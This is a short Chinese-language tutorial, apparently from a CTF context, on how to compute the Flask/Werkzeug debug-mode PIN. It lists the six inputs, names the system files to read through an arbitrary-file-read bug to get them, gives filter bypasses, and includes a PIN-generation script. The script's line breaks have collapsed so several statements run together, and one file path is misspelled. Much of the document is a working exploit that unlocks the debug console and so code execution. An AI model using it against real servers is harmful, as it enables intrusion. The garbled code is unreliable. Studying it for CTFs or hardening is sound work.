pin码是flask在开启debug模式下,进行代码调试模式所需的进入密码,需要正确的PIN码才能进入调试模式.
对于pin码运算方法的描述如下
pin码生成要六要素
1.username 在可以任意文件读的条件下读 /etc/passwd进行猜测
2.modname 默认flask.app
3.appname 默认Flask
4.moddir flask库下app.py的绝对路径,可以通过报错拿到,如传参的时候给个不存在的变量
5.uuidnode mac地址的十进制,任意文件读 /sys/class/net/eth0/address
6.machine_id 机器码 这个待会细说,一般就生成pin码不对就是这错了
详细说一下这个machine_id的获取方式.一般是从如下的三个文件中的某一个去获取:/proc/self/cgroup,/etc/machine-id和/proc/sys/kernl/random/boot_id.
如果self被禁用可以用1来绕过,cgroup被禁用可以使用mountinfo或者cpuset去绕过.
在python3.8以后使用的脚本如下
import hashlib
from itertools import chain
probably_public_bits = ['app','flask.app','Flask','/usr/local/lib/python3.8/site-packages/flask/app.py'
]private_bits = ['2485376911915','7265fe765262551a676151a24c02b7b646a18828428b87e35c5482255b121e8f7464b02e50ffe3f1d626f8c05793f49a'# get_machine_id(), /etc/machine-id /proc/sys/kernel/random/boot_id
] h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):if not bit:continueif isinstance(bit, str):bit = bit.encode("utf-8")h.update(bit)
h.update(b"cookiesalt")cookie_name = f"__wzd{h.hexdigest()[:20]}"# If we need to generate a pin we salt it a bit more so that we don't
# end up with the same value and generate out 9 digits
num = None
if num is None:h.update(b"pinsalt")num = f"{int(h.hexdigest(), 16):09d}"[:9]# Format the pincode in groups of digits for easier remembering if
# we don't have a result yet.
rv = None
if rv is None:for group_size in 5, 4, 3:if len(num) % group_size == 0:rv = "-".join(num[x : x + group_size].rjust(group_size, "0")for x in range(0, len(num), group_size))breakelse:rv = numprint(rv)
